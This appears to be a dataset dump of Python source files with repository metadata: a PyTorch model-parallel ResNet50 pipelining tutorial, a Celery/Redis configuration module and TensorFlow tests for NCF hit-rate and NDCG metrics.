# divide each batch into a pipeline of splits, such that when one split reaches
# the second sub-network, the following split can be fed into the first
# sub-network. In this way, two consecutive splits can run concurrently on two
# GPUs.
######################################################################
# Speed Up by Pipelining Inputs
# =======================
#
# In the following experiments, we further divide each 120-image batch into
# 20-image splits. As PyTorch launches CUDA operations asynchronizely, the
# implementation does not need to spawn multiple threads to achieve
# concurrency.
class PipelineParallelResNet50(ModelParallelResNet50):
def __init__(self, split_size=20, *args, **kwargs):
super(PipelineParallelResNet50, self).__init__(*args, **kwargs)
self.split_size = split_size
def forward(self, x):
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.seq1(s_next).to('cuda:1')
ret = []
for s_next in splits:
# A. s_prev runs on cuda:1
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
# B. s_next runs on cuda:0, which can run concurrently with A
s_prev = self.seq1(s_next).to('cuda:1')
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
return torch.cat(ret)
setup = "model = PipelineParallelResNet50()"
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
pp_mean, pp_std = np.mean(pp_run_times), np.std(pp_run_times)
plot([mp_mean, rn_mean, pp_mean],
[mp_std, rn_std, pp_std],
['Model Parallel', 'Single GPU', 'Pipelining Model Parallel'],
'mp_vs_rn_vs_pp.png')
######################################################################
# Please note, device-to-device tensor copy operations are synchronized on
# current streams on the source and the destination devices. If you create
# multiple streams, you have to make sure that copy operations are properly
# synchronized. Writing the source tensor or reading/writing the destination
# tensor before finishing the copy operation can lead to undefined behavior.
# The above implementation only uses default streams on both source and
# destination devices, hence it is not necessary to enforce additional
# synchronizations.
#
# .. figure:: /_static/img/model-parallel-images/mp_vs_rn_vs_pp.png
# :alt:
#
# The experiment result shows that, pipelining inputs to model parallel
# ResNet50 speeds up the training process by roughly ``3.75/2.51-1=49%``. It is
# still quite far away from the ideal 100% speedup. As we have introduced a new
# parameter ``split_sizes`` in our pipeline parallel implementation, it is
# unclear how the new parameter affects the overall training time. Intuitively
# speaking, using small ``split_size`` leads to many tiny CUDA kernel launch,
# while using large ``split_size`` results to relatively long idle times during
# the first and last splits. Neither are optimal. There might be an optimal
# ``split_size`` configuration for this specific experiment. Let us try to find
# it by running experiments using several different ``split_size`` values.
means = []
stds = []
split_sizes = [1, 3, 5, 8, 10, 12, 20, 40, 60]
for split_size in split_sizes:
setup = "model = PipelineParallelResNet50(split_size=%d)" % split_size
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
means.append(np.mean(pp_run_times))
stds.append(np.std(pp_run_times))
fig, ax = plt.subplots()
ax.plot(split_sizes, means)
ax.errorbar(split_sizes, means, yerr=stds, ecolor='red', fmt='ro')
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xlabel('Pipeline Split Size')
ax.set_xticks(split_sizes)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig("split_size_tradeoff.png")
plt.close(fig)
######################################################################
#
# .. figure:: /_static/img/model-parallel-images/split_size_tradeoff.png
# :alt:
#
# The result shows that setting ``split_size`` to 12 achieves the fastest
# training speed, which leads to ``3.75/2.43-1=54%`` speedup. There are
# still opportunities to further accelerate the training process. For example,
# all operations on ``cuda:0`` is placed on its default stream. It means that
# computations on the next split cannot overlap with the copy operation of the
# prev split. However, as prev and next splits are different tensors, there is
# no problem to overlap one's computation with the other one's copy. The
# implementation need to use multiple streams on both GPUs, and different
# sub-network structures require different stream management strategies. As no
# general multi-stream solution works for all model parallel use cases, we will
# not discuss it in this tutorial.
| 39.469565
| 90
| 0.674598
|
import torch
import torch.nn as nn
import torch.optim as optim
class ToyModel(nn.Module):
def __init__(self):
super(ToyModel, self).__init__()
self.net1 = torch.nn.Linear(10, 10).to('cuda:0')
self.relu = torch.nn.ReLU()
self.net2 = torch.nn.Linear(10, 5).to('cuda:1')
def forward(self, x):
x = self.relu(self.net1(x.to('cuda:0')))
return self.net2(x.to('cuda:1'))
model = ToyModel()
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
optimizer.zero_grad()
outputs = model(torch.randn(20, 10))
labels = torch.randn(20, 5).to('cuda:1')
loss_fn(outputs, labels).backward()
optimizer.step()
from torchvision.models.resnet import ResNet, Bottleneck
num_classes = 1000
class ModelParallelResNet50(ResNet):
def __init__(self, *args, **kwargs):
super(ModelParallelResNet50, self).__init__(
Bottleneck, [3, 4, 6, 3], num_classes=num_classes, *args, **kwargs)
self.seq1 = nn.Sequential(
self.conv1,
self.bn1,
self.relu,
self.maxpool,
self.layer1,
self.layer2
).to('cuda:0')
self.seq2 = nn.Sequential(
self.layer3,
self.layer4,
self.avgpool,
).to('cuda:1')
self.fc.to('cuda:1')
def forward(self, x):
x = self.seq2(self.seq1(x).to('cuda:1'))
return self.fc(x.view(x.size(0), -1))
import torchvision.models as models
num_batches = 3
batch_size = 120
image_w = 128
image_h = 128
def train(model):
model.train(True)
loss_fn = nn.MSELoss()
optimizer = optim.SGD(model.parameters(), lr=0.001)
one_hot_indices = torch.LongTensor(batch_size) \
.random_(0, num_classes) \
.view(batch_size, 1)
for _ in range(num_batches):
inputs = torch.randn(batch_size, 3, image_w, image_h)
labels = torch.zeros(batch_size, num_classes) \
.scatter_(1, one_hot_indices, 1)
optimizer.zero_grad()
outputs = model(inputs.to('cuda:0'))
labels = labels.to(outputs.device)
loss_fn(outputs, labels).backward()
optimizer.step()
import matplotlib.pyplot as plt
plt.switch_backend('Agg')
import numpy as np
import timeit
num_repeat = 10
stmt = "train(model)"
setup = "model = ModelParallelResNet50()"
mp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
mp_mean, mp_std = np.mean(mp_run_times), np.std(mp_run_times)
setup = "import torchvision.models as models;" + \
"model = models.resnet50(num_classes=num_classes).to('cuda:0')"
rn_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
rn_mean, rn_std = np.mean(rn_run_times), np.std(rn_run_times)
def plot(means, stds, labels, fig_name):
fig, ax = plt.subplots()
ax.bar(np.arange(len(means)), means, yerr=stds,
align='center', alpha=0.5, ecolor='red', capsize=10, width=0.6)
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xticks(np.arange(len(means)))
ax.set_xticklabels(labels)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig(fig_name)
plt.close(fig)
plot([mp_mean, rn_mean],
[mp_std, rn_std],
['Model Parallel', 'Single GPU'],
'mp_vs_rn.png')
class PipelineParallelResNet50(ModelParallelResNet50):
def __init__(self, split_size=20, *args, **kwargs):
super(PipelineParallelResNet50, self).__init__(*args, **kwargs)
self.split_size = split_size
def forward(self, x):
splits = iter(x.split(self.split_size, dim=0))
s_next = next(splits)
s_prev = self.seq1(s_next).to('cuda:1')
ret = []
for s_next in splits:
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
s_prev = self.seq1(s_next).to('cuda:1')
s_prev = self.seq2(s_prev)
ret.append(self.fc(s_prev.view(s_prev.size(0), -1)))
return torch.cat(ret)
setup = "model = PipelineParallelResNet50()"
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
pp_mean, pp_std = np.mean(pp_run_times), np.std(pp_run_times)
plot([mp_mean, rn_mean, pp_mean],
[mp_std, rn_std, pp_std],
['Model Parallel', 'Single GPU', 'Pipelining Model Parallel'],
'mp_vs_rn_vs_pp.png')
means = []
stds = []
split_sizes = [1, 3, 5, 8, 10, 12, 20, 40, 60]
for split_size in split_sizes:
setup = "model = PipelineParallelResNet50(split_size=%d)" % split_size
pp_run_times = timeit.repeat(
stmt, setup, number=1, repeat=num_repeat, globals=globals())
means.append(np.mean(pp_run_times))
stds.append(np.std(pp_run_times))
fig, ax = plt.subplots()
ax.plot(split_sizes, means)
ax.errorbar(split_sizes, means, yerr=stds, ecolor='red', fmt='ro')
ax.set_ylabel('ResNet50 Execution Time (Second)')
ax.set_xlabel('Pipeline Split Size')
ax.set_xticks(split_sizes)
ax.yaxis.grid(True)
plt.tight_layout()
plt.savefig("split_size_tradeoff.png")
plt.close(fig)
| true
| true
|
f707b572ae1a2c834e8c3449601082540bbbbc5c
| 799
|
py
|
Python
|
celery_app.py
|
smileboywtu/fastapi-boilerplate
|
0123b621dca546d80a9811dfcc755657058ca795
|
[
"MIT"
] | 22
|
2020-03-07T08:38:48.000Z
|
2022-01-14T15:59:42.000Z
|
celery_app.py
|
smileboywtu/fastapi-boilerplate
|
0123b621dca546d80a9811dfcc755657058ca795
|
[
"MIT"
] | 1
|
2020-09-08T03:24:28.000Z
|
2020-09-08T03:24:28.000Z
|
celery_app.py
|
smileboywtu/fastapi-boilerplate
|
0123b621dca546d80a9811dfcc755657058ca795
|
[
"MIT"
] | 2
|
2021-12-27T14:28:36.000Z
|
2022-01-29T19:13:37.000Z
|
# -*- coding: utf-8 -*-
from celery import Celery
import config
if config.REDIS_PASSWD:
redis_url = "redis://:{0}@{1}:{2}/{3}".format(
config.REDIS_PASSWD,
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
else:
redis_url = "redis://{0}:{1}/{2}".format(
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
celery_app = Celery(
broker=redis_url,
backend=redis_url,
)
celery_app.conf.update(
task_serializer="json",
accept_content=["json"],
result_serializer="json",
timezone="Asia/Shanghai",
enable_utc=True,
)
celery_app.autodiscover_tasks([
"tasks",
], force=True)
celery_app.conf.beat_schedule = {
"parse_log": {
"task": "parse_log",
"schedule": 30
}
}
| 18.581395
| 50
| 0.607009
|
from celery import Celery
import config
if config.REDIS_PASSWD:
redis_url = "redis://:{0}@{1}:{2}/{3}".format(
config.REDIS_PASSWD,
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
else:
redis_url = "redis://{0}:{1}/{2}".format(
config.REDIS_HOST,
config.REDIS_PORT,
config.REDIS_DB
)
celery_app = Celery(
broker=redis_url,
backend=redis_url,
)
celery_app.conf.update(
task_serializer="json",
accept_content=["json"],
result_serializer="json",
timezone="Asia/Shanghai",
enable_utc=True,
)
celery_app.autodiscover_tasks([
"tasks",
], force=True)
celery_app.conf.beat_schedule = {
"parse_log": {
"task": "parse_log",
"schedule": 30
}
}
| true
| true
|
f707b5ac5257edd2223a3f5854acf58bcac157b9
| 10,501
|
py
|
Python
|
official/recommendation/ncf_test.py
|
kichiro09/object-detection
|
b7087955bb5f2689b0ef42ab5400931cd8f416b6
|
[
"Apache-2.0"
] | 48
|
2018-12-19T13:09:14.000Z
|
2021-11-12T12:04:36.000Z
|
official/recommendation/ncf_test.py
|
bhushan23/models
|
e498d28503fd4a12d1fa9ade41891f2f9601c674
|
[
"Apache-2.0"
] | 12
|
2018-12-13T18:04:36.000Z
|
2019-06-14T20:49:33.000Z
|
official/recommendation/ncf_test.py
|
bhushan23/models
|
e498d28503fd4a12d1fa9ade41891f2f9601c674
|
[
"Apache-2.0"
] | 44
|
2018-11-09T21:04:52.000Z
|
2019-06-24T07:40:28.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests NCF."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import mock
import numpy as np
import tensorflow as tf
from absl import flags
from absl.testing import flagsaver
from official.recommendation import constants as rconst
from official.recommendation import data_preprocessing
from official.recommendation import neumf_model
from official.recommendation import ncf_main
from official.recommendation import stat_utils
NUM_TRAIN_NEG = 4
class NcfTest(tf.test.TestCase):
@classmethod
def setUpClass(cls): # pylint: disable=invalid-name
super(NcfTest, cls).setUpClass()
ncf_main.define_ncf_flags()
def setUp(self):
self.top_k_old = rconst.TOP_K
self.num_eval_negatives_old = rconst.NUM_EVAL_NEGATIVES
rconst.NUM_EVAL_NEGATIVES = 2
def tearDown(self):
rconst.NUM_EVAL_NEGATIVES = self.num_eval_negatives_old
rconst.TOP_K = self.top_k_old
def get_hit_rate_and_ndcg(self, predicted_scores_by_user, items_by_user,
top_k=rconst.TOP_K, match_mlperf=False):
rconst.TOP_K = top_k
rconst.NUM_EVAL_NEGATIVES = predicted_scores_by_user.shape[1] - 1
g = tf.Graph()
with g.as_default():
logits = tf.convert_to_tensor(
predicted_scores_by_user.reshape((-1, 1)), tf.float32)
softmax_logits = tf.concat([tf.zeros(logits.shape, dtype=logits.dtype),
logits], axis=1)
duplicate_mask = tf.convert_to_tensor(
stat_utils.mask_duplicates(items_by_user, axis=1), tf.float32)
metric_ops = neumf_model.compute_eval_loss_and_metrics(
logits=logits, softmax_logits=softmax_logits,
duplicate_mask=duplicate_mask, num_training_neg=NUM_TRAIN_NEG,
match_mlperf=match_mlperf).eval_metric_ops
hr = metric_ops[rconst.HR_KEY]
ndcg = metric_ops[rconst.NDCG_KEY]
init = [tf.global_variables_initializer(),
tf.local_variables_initializer()]
with self.test_session(graph=g) as sess:
sess.run(init)
return sess.run([hr[1], ndcg[1]])
def test_hit_rate_and_ndcg(self):
# Test with no duplicate items
predictions = np.array([
[1., 2., 0.], # In top 2
[2., 1., 0.], # In top 1
[0., 2., 1.], # In top 3
[2., 3., 4.] # In top 3
])
items = np.array([
[1, 2, 3],
[2, 3, 1],
[3, 2, 1],
[2, 1, 3],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items. In the MLPerf case, we treat the duplicates as
# a single item. Otherwise, we treat the duplicates as separate items.
predictions = np.array([
[1., 2., 2., 3.], # In top 4. MLPerf: In top 3
[3., 1., 0., 2.], # In top 1. MLPerf: In top 1
[0., 2., 3., 2.], # In top 4. MLPerf: In top 3
[3., 2., 4., 2.] # In top 2. MLPerf: In top 2
])
items = np.array([
[1, 2, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 2],
[4, 3, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(5)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
# Test with duplicate items, where the predictions for the same item can
# differ. In the MLPerf case, we should take the first prediction.
predictions = np.array([
[3., 2., 4., 4.], # In top 3. MLPerf: In top 2
[3., 4., 2., 4.], # In top 3. MLPerf: In top 3
[2., 3., 4., 1.], # In top 3. MLPerf: In top 2
[4., 3., 5., 2.] # In top 2. MLPerf: In top 1
])
items = np.array([
[1, 2, 2, 3],
[4, 3, 3, 2],
[2, 1, 1, 1],
[4, 2, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 0 / 4)
self.assertAlmostEqual(ndcg, 0 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 3 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
_BASE_END_TO_END_FLAGS = {
"batch_size": 1024,
"train_epochs": 1,
"use_synthetic_data": True
}
@flagsaver.flagsaver(**_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end(self):
ncf_main.main(None)
@flagsaver.flagsaver(ml_perf=True, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_mlperf(self):
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_no_estimator(self):
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_while_loop(self):
# We cannot set use_while_loop = True in the flagsaver constructor, because
# if the flagsaver sets it to True before setting use_estimator to False,
# the flag validator will throw an error.
flags.FLAGS.use_while_loop = True
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.test.main()
| 38.185455
| 80
| 0.614227
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import mock
import numpy as np
import tensorflow as tf
from absl import flags
from absl.testing import flagsaver
from official.recommendation import constants as rconst
from official.recommendation import data_preprocessing
from official.recommendation import neumf_model
from official.recommendation import ncf_main
from official.recommendation import stat_utils
NUM_TRAIN_NEG = 4
class NcfTest(tf.test.TestCase):
@classmethod
def setUpClass(cls): super(NcfTest, cls).setUpClass()
ncf_main.define_ncf_flags()
def setUp(self):
self.top_k_old = rconst.TOP_K
self.num_eval_negatives_old = rconst.NUM_EVAL_NEGATIVES
rconst.NUM_EVAL_NEGATIVES = 2
def tearDown(self):
rconst.NUM_EVAL_NEGATIVES = self.num_eval_negatives_old
rconst.TOP_K = self.top_k_old
def get_hit_rate_and_ndcg(self, predicted_scores_by_user, items_by_user,
top_k=rconst.TOP_K, match_mlperf=False):
rconst.TOP_K = top_k
rconst.NUM_EVAL_NEGATIVES = predicted_scores_by_user.shape[1] - 1
g = tf.Graph()
with g.as_default():
logits = tf.convert_to_tensor(
predicted_scores_by_user.reshape((-1, 1)), tf.float32)
softmax_logits = tf.concat([tf.zeros(logits.shape, dtype=logits.dtype),
logits], axis=1)
duplicate_mask = tf.convert_to_tensor(
stat_utils.mask_duplicates(items_by_user, axis=1), tf.float32)
metric_ops = neumf_model.compute_eval_loss_and_metrics(
logits=logits, softmax_logits=softmax_logits,
duplicate_mask=duplicate_mask, num_training_neg=NUM_TRAIN_NEG,
match_mlperf=match_mlperf).eval_metric_ops
hr = metric_ops[rconst.HR_KEY]
ndcg = metric_ops[rconst.NDCG_KEY]
init = [tf.global_variables_initializer(),
tf.local_variables_initializer()]
with self.test_session(graph=g) as sess:
sess.run(init)
return sess.run([hr[1], ndcg[1]])
def test_hit_rate_and_ndcg(self):
predictions = np.array([
[1., 2., 0.], [2., 1., 0.], [0., 2., 1.], [2., 3., 4.] ])
items = np.array([
[1, 2, 3],
[2, 3, 1],
[3, 2, 1],
[2, 1, 3],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
predictions = np.array([
[1., 2., 2., 3.], [3., 1., 0., 2.], [0., 2., 3., 2.], [3., 2., 4., 2.] ])
items = np.array([
[1, 2, 2, 3],
[1, 2, 3, 4],
[1, 2, 3, 2],
[4, 3, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(5)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 2 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + math.log(2) / math.log(3) +
2 * math.log(2) / math.log(4)) / 4)
predictions = np.array([
[3., 2., 4., 4.], [3., 4., 2., 4.], [2., 3., 4., 1.], [4., 3., 5., 2.] ])
items = np.array([
[1, 2, 2, 3],
[4, 3, 3, 2],
[2, 1, 1, 1],
[4, 2, 2, 1],
])
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1)
self.assertAlmostEqual(hr, 0 / 4)
self.assertAlmostEqual(ndcg, 0 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (math.log(2) / math.log(3) +
3 * math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 1,
match_mlperf=True)
self.assertAlmostEqual(hr, 1 / 4)
self.assertAlmostEqual(ndcg, 1 / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 2,
match_mlperf=True)
self.assertAlmostEqual(hr, 3 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 3,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
hr, ndcg = self.get_hit_rate_and_ndcg(predictions, items, 4,
match_mlperf=True)
self.assertAlmostEqual(hr, 4 / 4)
self.assertAlmostEqual(ndcg, (1 + 2 * math.log(2) / math.log(3) +
math.log(2) / math.log(4)) / 4)
_BASE_END_TO_END_FLAGS = {
"batch_size": 1024,
"train_epochs": 1,
"use_synthetic_data": True
}
@flagsaver.flagsaver(**_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end(self):
ncf_main.main(None)
@flagsaver.flagsaver(ml_perf=True, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_mlperf(self):
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_no_estimator(self):
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
@flagsaver.flagsaver(use_estimator=False, **_BASE_END_TO_END_FLAGS)
@mock.patch.object(data_preprocessing, "SYNTHETIC_BATCHES_PER_EPOCH", 100)
def test_end_to_end_while_loop(self):
flags.FLAGS.use_while_loop = True
ncf_main.main(None)
flags.FLAGS.ml_perf = True
ncf_main.main(None)
if __name__ == "__main__":
tf.logging.set_verbosity(tf.logging.INFO)
tf.test.main()
| true
| true
|
f707b6735f008d7dd90e517844d0d8cbdb9bb221
| 830
|
py
|
Python
|
scripts/advanced_collectible/deploy_advanced.py
|
glogwa68/Gojicoin
|
8f65f7091f965e63b62f72347d8cf3d5c79f36ab
|
[
"MIT"
] | 2
|
2021-04-22T16:16:46.000Z
|
2021-04-24T07:48:11.000Z
|
scripts/advanced_collectible/deploy_advanced.py
|
toiaa/nft-mix
|
c73d1f2612440490c33b04c8cbac0eb9a086c514
|
[
"MIT"
] | null | null | null |
scripts/advanced_collectible/deploy_advanced.py
|
toiaa/nft-mix
|
